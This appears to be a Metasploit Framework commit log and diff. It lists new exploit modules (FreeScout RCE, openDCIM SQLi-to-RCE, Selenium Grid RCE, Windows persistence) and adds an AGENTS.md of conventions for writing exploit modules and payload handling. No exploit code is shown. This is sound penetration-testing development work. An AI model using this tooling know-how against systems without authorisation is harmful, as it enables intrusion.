Spencer McIntyre 400b2d7eb8 Update the specs 2026-03-05 13:56:17 -05:00
Spencer McIntyre 3a4c4ec7c3 Allows parents to be an existing Mdm::Service 2026-03-05 12:51:55 -05:00
Valentin Lobstein 9b7faea3c2 Feat: Add FreeScout ZWSP .htaccess RCE module (CVE-2026-28289) 2026-03-05 18:06:32 +01:00
Spencer McIntyre 7ff46b818f Fix a missing argument in #report_icertpassage_service 2026-03-05 09:37:29 -05:00
Spencer McIntyre 6111968826 Log attributes with 'password' as passwords 2026-03-04 14:47:36 -05:00
Spencer McIntyre 7420d21f12 Report the full service chains 2026-03-04 13:34:23 -05:00
Spencer McIntyre 0faa0bd36b Add the #ldap_client_ssl alias 2026-03-04 13:15:33 -05:00
Brendan a64404717a Merge pull request #7 from smcintyre-r7/pr/collab/20752
Web Enrollment Tweaks
2026-03-04 09:41:32 -06:00
LucasCsmt 9d7556e3a8 Altering the 'start_service' emplacement 2026-03-04 15:38:10 +01:00
LucasCsmt 4a0957e68b Altering the status code check 2026-03-04 15:30:56 +01:00
LucasCsmt c137331090 Enhancing the check method 2026-03-04 15:29:00 +01:00
LucasCsmt 720004a33e Adding upload of payload and execution 2026-03-04 15:21:12 +01:00
LucasCsmt 040cabd249 Adding a function that get the cookie 2026-03-04 13:47:06 +01:00
LucasCsmt 8dbc764730 Adding a check function and build_payload
I added a check function that check if the server is accessible and
vulnerable. I added also a build_payload function that build the php
file that will be executed by the vulnerable host.
2026-03-04 10:39:59 +01:00
Spencer McIntyre da04abac19 Appease rubocop 2026-03-03 09:38:23 -05:00
Spencer McIntyre 4b616dd00b Report where creds are coming from 2026-03-03 09:38:23 -05:00
Spencer McIntyre 0a86601049 Report vulns in LDAP #check methods 2026-03-03 09:38:23 -05:00
Spencer McIntyre c5b9157c61 Update MsIcpr service reporting too 2026-03-03 09:38:23 -05:00
Spencer McIntyre c9d14ef449 Update ESC reported services and findings 2026-03-03 09:38:23 -05:00
Spencer McIntyre 3addd472a7 Report the LDAP service 2026-03-03 09:38:23 -05:00
x1o3 f87a5d9598 fixes review feedback 2026-03-02 17:38:14 +05:30
LucasCsmt 2d58156aaa Initialisation of the module file
This commit contain the initialisation of the module file including a
description, all the target and options that this module will need.
2026-03-02 10:47:07 +01:00
Valentin Lobstein 4aeacb7456 Fix: CmdStager compatibility with dash shell in openDCIM module
PHP exec() uses sh -c which is dash on Ubuntu. Dash echo does not
support -en flag, breaking the echo CmdStager flavor. Switch to
printf (octal) and bourne (base64) flavors which work in dash.

Also split backup_and_poison into backup_config and poison_dot so
CmdStager chunks don't overwrite the backup table, and escape
backslashes in SQL to preserve octal/hex sequences through MySQL.
2026-02-28 21:39:16 +01:00
Valentin Lobstein 2d8c3d69ed Feat: Add openDCIM install.php SQLi to RCE module
Exploits CVE-2026-28515, CVE-2026-28516, CVE-2026-28517 to chain
missing authorization, SQL injection, and command injection in
openDCIM's install.php for remote code execution.
2026-02-28 21:13:51 +01:00
x1o3 7d6d592efe logic fix & cleanup 2026-02-28 22:56:28 +05:30
x1o3 8ba79db6b6 msftidy_docs compliant 2026-02-28 21:30:40 +05:30
x1o3 657e53dcec Add module documentation 2026-02-28 20:59:49 +05:30
ArkaprabhaChakraborty 05f431717e Remove duplicated php filter chains and remove comments from documentation
Signed-off-by: ArkaprabhaChakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-28 12:37:13 +00:00
x1o3 524dd0efe9 rubocop && msftidy compliant 2026-02-27 20:01:55 +05:30
x1o3 7d57eda229 rubocop && msftidy compliant 2026-02-27 19:36:19 +05:30
Ramesh 53338b6736 fix: correct ARM LE ELF SO entry point alignment
The _start label in the armle ELF shared object template was landing
at offset 0xF6, which is half-word aligned but not word aligned.

ARM A32 requires 4-byte (word) alignment for instruction addresses.
This caused the shared object to fail to load and execute on 32-bit
ARM Linux targets.

Fix: add 2 null padding bytes between strtab and _start, pushing the
entry point from 0xF6 to 0xF8 (word aligned).

Fixes #19668
2026-02-27 19:14:08 +05:30
ArkaprabhaChakraborty 6de6dbf695 Fix module documentation
Signed-off-by: ArkaprabhaChakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-22 20:05:03 +00:00
ArkaprabhaChakraborty 4a1c9cb673 Add module documentation
Signed-off-by: ArkaprabhaChakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-22 19:59:35 +00:00
arkaprabhachakraborty 14ac2aec4f Add Administrator Panel login and file extrcation support. Refactor CNEXT functions.
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-22 04:14:48 +05:30
Valentin Lobstein 638b47ebf3 Feat: Unified Selenium Grid/Selenoid RCE with Firefox + Chrome auto-detection
Replace separate Chrome and Firefox modules with a single module that
auto-detects available browsers and picks the best attack vector.
Firefox profile handler preferred (unpatched on all Grid versions).
Remove incorrect CSRF framing, sudo wrapper, add FileDropper and
Selenoid support.
2026-02-21 14:41:42 +01:00
Valentin Lobstein 3dd3661352 Feat: Add Selenoid support to Selenium Grid Chrome RCE module 2026-02-21 12:34:09 +01:00
Valentin Lobstein 9e72f45349 Feat: Add Selenium Grid Chrome binary override RCE module 2026-02-21 12:07:08 +01:00
EclipseAditya 320effe9a1 Fix trailing backslash in shell registry operations 2026-02-21 06:13:23 +00:00
[Aaditya1273] d2860254eb Cleanup: Remove legacy windows/local/persistence in favor of windows/persistence/registry 2026-02-21 09:15:56 +05:30
h00die 2689c6c03b fix compatibility with session.sys 2026-02-17 16:38:22 -05:00
Spencer McIntyre 91041fb352 Set the default Http::Auth option 2026-02-13 09:12:18 -05:00
Spencer McIntyre 5172475006 Move the policy id datastore optio use #fetch 2026-02-12 17:31:40 -05:00
Spencer McIntyre e15aeffed8 Use the PFX option and rename to AdCs 2026-02-12 17:09:55 -05:00
arkaprabhachakraborty 384c1b5e03 Add initial osticket arbitraray file read auxiliary module
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-10 21:07:50 +05:30
bwatters-r7 b001b643d0 add library 2026-02-09 18:05:15 -06:00
bwatters-r7 c26acee9d6 Undo esc options, add new library 2026-02-09 18:04:04 -06:00
bwatters-r7 ad8ee601ff add lib in spec 2026-02-06 13:35:18 -06:00
bwatters-r7 cf0335e31c update specs 2026-02-06 11:38:33 -06:00
bwatters-r7 177985a761 Remove ms_csr library 2026-02-06 10:27:20 -06:00
bwatters-r7 08aaad3b1f Move options to ugly adcs_escx mixins, move csr to x509 library 2026-02-05 17:22:26 -06:00
bwatters-r7 41defeea8d Add catch for invalid credentials to prevent stacktrace 2026-02-02 17:00:10 -06:00
bwatters-r7 79eaded0f3 Rebase and steal great ideas from karanabe in #20882 2026-01-30 17:07:32 -06:00
bwatters-r7 e7881465f6 Add kerberos check and documentation on relay 2026-01-30 16:05:08 -06:00
bwatters-r7 dca11f8711 update non-relay web enrollment docs 2026-01-30 16:05:08 -06:00
bwatters-r7 b19b578671 Library split, imports fixed, but HTTP auth for CSR broken? 2026-01-30 16:05:08 -06:00
bwatters-r7 16b5c01871 Split required methods from ms_icpr library 2026-01-30 16:05:08 -06:00
bwatters-r7 54e26f65f2 ESC2 on_behalf_of working 2026-01-30 16:05:08 -06:00
bwatters-r7 7cc0b98d08 With not-working on_behalf_of 2026-01-30 16:05:08 -06:00
bwatters-r7 372a22c8ab Add ALT_UPN and ALT_DNS, remove unneeded options
Still neet to add `on_behalf_of`
2026-01-30 16:05:08 -06:00
bwatters-r7 9b0f8ab510 Update default mode option, module name, and description 2026-01-30 16:05:08 -06:00
bwatters-r7 06633cf7f4 Fix domain query and comparisons, add check, validate, and match options for esc8 2026-01-30 16:05:08 -06:00
h00die 822227ddf2 Update modules/exploits/windows/persistence/bits.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-01-14 11:20:23 -05:00
h00die 08ce855fa9 Update modules/exploits/windows/persistence/bits.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-01-14 11:20:08 -05:00
h00die 31d7e424c0 s4u add attck trigger ref 2026-01-11 07:43:43 -05:00
h00die 7017273a84 bits persistence works 2026-01-01 19:55:22 -05:00
h00die 47c47df0bb bits persistence works 2026-01-01 08:28:03 -05:00
h00die e778f40055 bits persistence works but no delay happening 2026-01-01 08:05:41 -05:00
h00die 8838733f97 s4u persistence updates 2025-12-27 07:43:51 -05:00
h00die a44fe6f992 s4u persistence updates 2025-12-27 07:33:15 -05:00
1845 changed files with 70546 additions and 15334 deletions
+3
View File
@@ -0,0 +1,3 @@
# Copilot Instructions
Refer to [AGENTS.md](../AGENTS.md) in the repository root for all project conventions, coding standards, and AI agent guidelines.
+31 -5
View File
@@ -12,9 +12,37 @@ on:
required: false
default: "[]"
type: string
additional_rails_versions:
description: 'Additional Rails version requirements as a JSON array (for example: ["~> 8.1.0"])'
required: false
default: "[]"
type: string
# Caller example:
# with:
# additional_rails_versions: '["~> 8.1.0", "~> 8.2.0"]'
jobs:
prepare_matrix:
runs-on: ubuntu-latest
outputs:
rails_versions: ${{ steps.merge_rails_versions.outputs.rails_versions }}
steps:
- name: Build Rails version matrix
id: merge_rails_versions
run: |
default_rails_versions='["~> 7.0.0","~> 7.1.0","~> 7.2.0"]'
additional_rails_versions='${{ inputs.additional_rails_versions }}'
rails_versions=$(jq -cn \
--argjson defaults "$default_rails_versions" \
--argjson extras "$additional_rails_versions" \
'$defaults + $extras | unique')
echo "rails_versions=$rails_versions" >> "$GITHUB_OUTPUT"
shell: bash
test:
needs: prepare_matrix
runs-on: ${{ matrix.os }}
timeout-minutes: 40
@@ -25,18 +53,16 @@ jobs:
- '3.2'
- '3.3'
- '3.4'
rails:
- '~> 7.0.0'
- '~> 7.1.0'
- '~> 7.2.0'
rails: ${{ fromJSON(needs.prepare_matrix.outputs.rails_versions) }}
postgres:
- '9.6'
- '14.19'
- '16.8'
os:
- ubuntu-latest
env:
RAILS_ENV: test
RAILS_VERSION: ${{ matrix.rails }}
name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
steps:
@@ -284,21 +284,21 @@ jobs:
run: |
Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
dir
$InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
$WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
$Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
$process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
if ($process.ExitCode -eq 0) {
Write-Host "components have been successfully added"
} else {
Write-Host "components were not installed"
exit 1
}
Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
$r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
Write-Host $r
$r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
Write-Host $r
# $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
# $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
# $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
# $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
# if ($process.ExitCode -eq 0) {
# Write-Host "components have been successfully added"
# } else {
# Write-Host "components were not installed"
# exit 1
# }
# Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
# $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
# Write-Host $r
# $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
# Write-Host $r
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+12
View File
@@ -0,0 +1,12 @@
---
inclusion: always
---
# Metasploit Framework — Kiro Steering
Follow the project's AI agent instructions and coding conventions defined in the repository root.
## References
- AI agent instructions: #[[file:AGENTS.md]]
- Contributing guide: #[[file:CONTRIBUTING.md]]
- RuboCop config: #[[file:.rubocop.yml]]
+13
View File
@@ -25,6 +25,8 @@ require:
- ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
- ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
- ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
- ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
- ./lib/rubocop/cop/lint/bare_check_code_in_non_exploit.rb
Layout/SpaceBeforeBrackets:
Enabled: true
@@ -683,3 +685,14 @@ Lint/DetectOutdatedCmdExecApi:
Detects outdated usage of cmd_exec with separate arguments.
Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
Enabled: true
Lint/BareCheckCodeInNonExploit:
Description: >-
Use Exploit::CheckCode instead of bare CheckCode in non-exploit modules.
Bare CheckCode will raise a NameError at runtime in auxiliary, post, and evasion modules
because CheckCode is defined inside Msf::Exploit which is not in their ancestor chain.
Enabled: true
Include:
- 'modules/auxiliary/**/*'
- 'modules/post/**/*'
- 'modules/evasion/**/*'
+122
View File
@@ -0,0 +1,122 @@
# AI Agent Instructions for Metasploit Framework
## Project Overview
Metasploit Framework is an open-source penetration testing and exploitation framework written in Ruby. It provides infrastructure for developing, testing, and executing exploit code against remote targets.
## Project Structure
- `modules/` — Metasploit modules (exploits, auxiliary, post, payloads, encoders, evasion, nops)
- `lib/msf/` — Core framework library code
- `lib/rex/` — Rex (Ruby Exploitation) library
- `lib/metasploit/` — Metasploit namespace libraries
- `data/` — Data files used by modules (wordlists, templates, binaries)
- `spec/` — RSpec test suite
- `tools/` — Developer and operational tools
- `plugins/` — msfconsole plugins
- `scripts/` — Example automation scripts
## Coding Conventions
- Ruby (see `.ruby-version` for the current version). Minimum supported: 3.1+
- Follow the project's `.rubocop.yml` configuration — run `rubocop` on changed files before submitting
- Run `ruby tools/dev/msftidy.rb <module_file_path>` to catch common module issues
- Add `# frozen_string_literal: true` to new files (the RuboCop cop is disabled project-wide for legacy code, but new files should include it)
- No enforced line length limit, but keep code readable
- Use `%q{}` for long multi-line strings (curly braces preferred for module descriptions)
- Multiline block comments are acceptable for embedded code snippets/payloads
- Don't use `get_`/`set_` prefixes for accessor methods in new code
- Method parameter names must be at least 2 characters (exception for well-known crypto abbreviations)
### Module Development
- Prefer writing modules in Ruby. Go and Python modules are accepted, but their external runtimes don't support the full framework API (e.g. network pivoting). Ruby modules do not have this limitation
- Prefer using hash over an array for return values, and use kwargs for reusable APIs for future extensions
- Before writing a new module, check that there is not an existing module or open pull request that already covers the same functionality
- Each module should be in its own file under the appropriate `modules/` subdirectory. In some scenarios adding module actions or targets is preferred.
- Exploits require a `DisclosureDate` field
- Exploits, auxiliary, and post modules require `Notes` with `SideEffects`
- Use the module mixin APIs — don't reinvent the wheel
- Use `create_process(executable, args: [], time_out: 15, opts: {})` instead of the deprecated `cmd_exec` with separate arguments
- License new code with `MSF_LICENSE` (the project default, defined in `lib/msf/core/constants.rb`)
- When overriding `cleanup`, always call `super` to ensure the parent mixin chain cleans up connections and sessions properly
- When possible don't set a default payload (`DefaultOptions` with `'PAYLOAD'`) in modules — let the framework choose the most appropriate payload automatically
- New modules require an associated markdown file in the `documentation/modules` folder with the same structure, including steps to set up the vulnerable environment for testing
- Module descriptions or documentation should list the range of vulnerable versions and the fixed version of the affected software, when known
- `report_service` method called when a service can be reported
- `report_vuln` method called when a vuln can be reported
- When creating a fake account / username use FAKER not `rand_test_alphanumeric`
- Always use `res.get_json_document` to convert an HTTP response to a hash instead of calling `JSON.parse(res.body)`
- If there's only one `ACTION` in the exploit, it can likely be omitted.
- `Msf::Exploit::SQLi` should be used if it's exploiting an SQLi
- All `print_*` calls should start with a capital
- when opening a file, make sure the file exists first
- when checking for a string in a response - will it always be in english?
- Ensure hardcoded strings being regex'ed will be consistent across multiple versions
- Use the TEST-NET-1 range for example / non-routeable IP addresses in unit tests and spec files: `192.0.2.0`. Local/private IPs are fine in module documentation scenarios.
- Use fetch payload instead of command stagers when only options that request the stage are available (i.e. dont use a cmd stager and only allow curl/wget).
- Define bad characters instead of explicitly base-64 encoding payloads
- Use `ARCH_CMD` payloads instead of command stagers when only curl/wget and other download mechanisms would be available
- Dont check the number of sessions at the end of an exploit and report success based on that, not all payloads open sessions
- Dont submit any kind of opaque binary blob, everything must include source code and build instructions
- Dont print host information like `#{ip}:#{port}` because it doesnt handle IPv6 addresses, instead use `#{Rex::Socket.to_authority(ip, port)}`
- Implement a `check` method when possible to allow users to verify vulnerability before exploitation
### Check Methods
- `check` methods must only return `CheckCode` values (e.g. `CheckCode::Vulnerable`, `CheckCode::Safe`) — never raise exceptions or call `fail_with`
- When writing a `check` method, verify it does not produce false positives when run against unrelated software or services
- Prefer using `Rex::Version` for version checks
- Use `fail_with(Failure::UnexpectedReply, '...')` (and other `Failure::*` constants) to bail out of `exploit`/`run` methods — don't use `raise` or bare `return` for error conditions
- `get_version` methods should return a REX version
- `CheckCode::Vulnerable` is only used when the vulnerability has been exploited
- `CheckCode::Appears` is only used when the application's versions has been checked`
- Use specific regular expressions or `res.get_html_document` for version extraction with CSS selectors. Don't use a generic selectors like `href .*` dot star to grab the version, be more precise.
- Do catch exceptions that may be raised and ensure a valid Check Code is returned
- Do research and determine a minimum version where the application is vulnerable, mark prior versions as safe
- Check helper methods that are used by both `#check` and `#exploit` (or `#run`) and make sure there is no condition (exception, return, etc) where `#check` could return something else than CheckCode.
- Prefer `prepend Msf::Exploit::Remote::AutoCheck` over manually calling `check` inside `exploit` — this lets the framework handle check-before-exploit automatically
### Library Code
- When adding complex binary or protocol parsing (e.g. BinData, RASN1, Rex::Struct2), include a code comment linking to the specification or RFC that defines the format being implemented
- Write RSpec tests for any library changes
- Follow [Better Specs](http://www.betterspecs.org/) conventions
- Write YARD documentation for public methods
- Keep PRs focused — small fixes are easier to review
- Any new hash cracking implementations require adding a test hash to `tools/dev/hash_cracker_validator.rb` and ensuring that passes without error
### Testing
- Tests live in `spec/` mirroring the `lib/` structure
- Run tests with: `bundle exec rspec spec/path/to/spec.rb`
### Preferred Libraries
- Use the `RubySMB` library for SMB modules
- Use `Rex::Stopwatch.elapsed_time` to track elapsed time
- Use the `Rex::MIME::Message` class for MIME messages instead of hardcoding XML
- When creating random variable names prefer `Rex::RandomIdentifier::Generator` and specify the runtime language used. This avoids generating langauge keywords that would break the script.
## Common Patterns
- Register options with `register_options` and `register_advanced_options`
- Use `SCREAMING_SNAKE_CASE` option names and `CamelCase` advanced option names
- Use `datastore['OPTION_NAME']` to access module options
- Use `print_status`, `print_good`, `print_error`, `print_warning` for console output
- Use `vprint_*` variants for verbose-only output
- Use `send_request_cgi` for HTTP requests in modules
- Use `connect` / `disconnect` for TCP socket operations
## Before Submitting
- Ensure `rubocop` and `msftidy` pass on any changed files with no new offenses
- Ensure `ruby tools/dev/msftidy_docs.rb <documentation_file>` passes on any changed documentation markdown docs with no new offenses
## What NOT to Do
- Don't submit untested code — all code must be manually verified
- Don't include sensitive information (IPs, credentials, API keys, hashes of credentials) in code or docs
- Don't include more than one module per pull request
- Don't add new scripts to `scripts/` — use post modules instead
- Don't use `pack`/`unpack` with invalid directives (enforced by linter)
+1 -1
View File
@@ -15,7 +15,7 @@ Before we get into the details of contributing code, you should know there are m
## Code Contributions
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. For a detailed reference of our coding conventions, project structure, and preferred patterns, see [AGENTS.md](./AGENTS.md). Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
+2 -1
View File
@@ -53,5 +53,6 @@ group :test do
gem 'allure-rspec'
# Manipulate Time.now in specs
gem 'timecop'
# stub and set expectations on HTTP requests
gem 'webmock', '~> 3.18'
end
+32 -17
View File
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.4.124)
metasploit-framework (6.4.133)
aarch64
abbrev
actionpack (~> 7.2.0)
@@ -42,11 +42,12 @@ PATH
jsobfu
json
lru_redux
mcp (= 0.13.0)
metasm
metasploit-concern
metasploit-credential
metasploit-credential (>= 6.0.21)
metasploit-model
metasploit-payloads (= 2.0.242)
metasploit-payloads (= 2.0.245)
metasploit_data_models (>= 6.0.15)
metasploit_payloads-mettle (= 1.0.46)
mqtt
@@ -211,7 +212,7 @@ GEM
bcrypt (3.1.20)
bcrypt_pbkdf (1.1.1)
benchmark (0.4.1)
bigdecimal (3.2.3)
bigdecimal (3.3.1)
bindata (2.4.15)
bootsnap (1.18.4)
msgpack (~> 1.2)
@@ -223,6 +224,9 @@ GEM
concurrent-ruby (1.3.5)
connection_pool (2.5.4)
cookiejar (0.3.4)
crack (1.0.1)
bigdecimal
rexml
crass (1.0.6)
csv (3.3.2)
daemons (1.4.1)
@@ -281,6 +285,7 @@ GEM
gyoku (1.4.0)
builder (>= 2.1.2)
rexml (~> 3.0)
hashdiff (1.2.1)
hashery (2.1.2)
hrr_rb_ssh (0.4.2)
hrr_rb_ssh-ed25519 (0.4.2)
@@ -304,6 +309,9 @@ GEM
jsobfu (0.4.2)
rkelly-remix
json (2.15.1)
json-schema (6.2.0)
addressable (~> 2.8)
bigdecimal (>= 3.1, < 5)
language_server-protocol (3.17.0.5)
license_finder (5.11.1)
bundler
@@ -322,6 +330,8 @@ GEM
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
lru_redux (1.1.0)
mcp (0.13.0)
json-schema (>= 4.1)
memory_profiler (1.1.0)
metasm (1.0.5)
metasploit-concern (5.0.5)
@@ -331,7 +341,7 @@ GEM
mutex_m
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.20)
metasploit-credential (6.0.23)
bigdecimal
csv
drb
@@ -352,18 +362,18 @@ GEM
drb
mutex_m
railties (~> 7.0)
metasploit-payloads (2.0.242)
metasploit_data_models (6.0.15)
activerecord (~> 7.0)
activesupport (~> 7.0)
metasploit-payloads (2.0.245)
metasploit_data_models (6.0.18)
activerecord (>= 7.0, < 8.1)
activesupport (>= 7.0, < 8.1)
arel-helpers
bigdecimal
drb
metasploit-concern
metasploit-model (~> 5.0.4)
metasploit-model (>= 5.0.4)
mutex_m
pg
railties (~> 7.0)
railties (>= 7.0, < 8.1)
recog
webrick
metasploit_payloads-mettle (1.0.46)
@@ -489,16 +499,16 @@ GEM
http-cookie (>= 1.0.2, < 2.0)
mime-types (>= 1.16, < 4.0)
netrc (~> 0.8)
rex-arch (0.1.19)
rex-arch (0.1.20)
rex-text
rex-bin_tools (0.1.10)
rex-bin_tools (0.1.16)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.35)
rex-encoder (0.1.8)
rex-core (0.1.36)
rex-encoder (0.1.10)
metasm
rex-arch
rex-text
@@ -531,7 +541,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.64)
rex-socket (0.1.65)
dnsruby
rex-core
rex-sslscan (0.1.13)
@@ -539,7 +549,7 @@ GEM
rex-socket
rex-text
rex-struct2 (0.1.5)
rex-text (0.2.61)
rex-text (0.2.63)
bigdecimal
rex-zip (0.1.6)
rex-text
@@ -649,6 +659,10 @@ GEM
useragent (0.16.11)
warden (1.2.9)
rack (>= 2.0.9)
webmock (3.26.2)
addressable (>= 2.8.0)
crack (>= 0.3.2)
hashdiff (>= 0.4.0, < 2.0.0)
webrick (1.9.1)
websocket-driver (0.7.7)
base64
@@ -699,6 +713,7 @@ DEPENDENCIES
simplecov (= 0.18.2)
test-prof
timecop
webmock (~> 3.18)
yard
BUNDLED WITH
+17 -12
View File
@@ -27,7 +27,7 @@ base64, 0.3.0, "ruby, Simplified BSD"
bcrypt, 3.1.20, MIT
bcrypt_pbkdf, 1.1.1, MIT
benchmark, 0.4.1, "ruby, Simplified BSD"
bigdecimal, 3.2.3, "ruby, Simplified BSD"
bigdecimal, 3.3.1, "ruby, Simplified BSD"
bindata, 2.4.15, "Simplified BSD"
bootsnap, 1.18.4, MIT
bson, 5.1.1, "Apache 2.0"
@@ -39,6 +39,7 @@ coderay, 1.1.3, MIT
concurrent-ruby, 1.3.5, MIT
connection_pool, 2.5.4, MIT
cookiejar, 0.3.4, "Simplified BSD"
crack, 1.0.1, MIT
crass, 1.0.6, MIT
csv, 3.3.2, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
@@ -71,6 +72,7 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
getoptlong, 0.2.1, "ruby, Simplified BSD"
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashdiff, 1.2.1, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
@@ -85,6 +87,7 @@ irb, 1.15.2, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.15.1, ruby
json-schema, 6.2.0, MIT
language_server-protocol, 3.17.0.5, MIT
license_finder, 5.11.1, MIT
lint_roller, 1.1.0, MIT
@@ -93,14 +96,15 @@ logger, 1.7.0, "ruby, Simplified BSD"
logging, 2.4.0, MIT
loofah, 2.24.1, MIT
lru_redux, 1.1.0, MIT
mcp, 0.13.0, "Apache 2.0"
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.5, "New BSD"
metasploit-credential, 6.0.20, "New BSD"
metasploit-framework, 6.4.124, "New BSD"
metasploit-credential, 6.0.23, "New BSD"
metasploit-framework, 6.4.133, "New BSD"
metasploit-model, 5.0.4, "New BSD"
metasploit-payloads, 2.0.242, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.15, "New BSD"
metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.18, "New BSD"
metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.7.0, MIT
@@ -166,10 +170,10 @@ regexp_parser, 2.11.3, MIT
reline, 0.6.2, ruby
require_all, 3.0.0, MIT
rest-client, 2.1.0, MIT
rex-arch, 0.1.19, "New BSD"
rex-bin_tools, 0.1.10, "New BSD"
rex-core, 0.1.35, "New BSD"
rex-encoder, 0.1.8, "New BSD"
rex-arch, 0.1.20, "New BSD"
rex-bin_tools, 0.1.16, "New BSD"
rex-core, 0.1.36, "New BSD"
rex-encoder, 0.1.10, "New BSD"
rex-exploitation, 0.1.44, "New BSD"
rex-java, 0.1.8, "New BSD"
rex-mime, 0.1.11, "New BSD"
@@ -179,10 +183,10 @@ rex-powershell, 0.1.103, "New BSD"
rex-random_identifier, 0.1.21, "New BSD"
rex-registry, 0.1.6, "New BSD"
rex-rop_builder, 0.1.6, "New BSD"
rex-socket, 0.1.64, "New BSD"
rex-socket, 0.1.65, "New BSD"
rex-sslscan, 0.1.13, "New BSD"
rex-struct2, 0.1.5, "New BSD"
rex-text, 0.2.61, "New BSD"
rex-text, 0.2.63, "New BSD"
rex-zip, 0.1.6, "New BSD"
rexml, 3.4.1, "Simplified BSD"
rinda, 0.2.0, "ruby, Simplified BSD"
@@ -202,7 +206,7 @@ ruby-prof, 1.7.2, "Simplified BSD"
ruby-progressbar, 1.13.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
ruby_smb, 3.3.15, "New BSD"
ruby_smb, 3.3.17, "New BSD"
rubyntlm, 0.6.5, MIT
rubyzip, 2.4.1, "Simplified BSD"
sawyer, 0.9.2, MIT
@@ -233,6 +237,7 @@ unicode-emoji, 4.1.0, MIT
unix-crypt, 1.3.1, 0BSD
useragent, 0.16.11, MIT
warden, 1.2.9, MIT
webmock, 3.26.2, MIT
webrick, 1.9.1, "ruby, Simplified BSD"
websocket-driver, 0.7.7, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
+33
View File
@@ -0,0 +1,33 @@
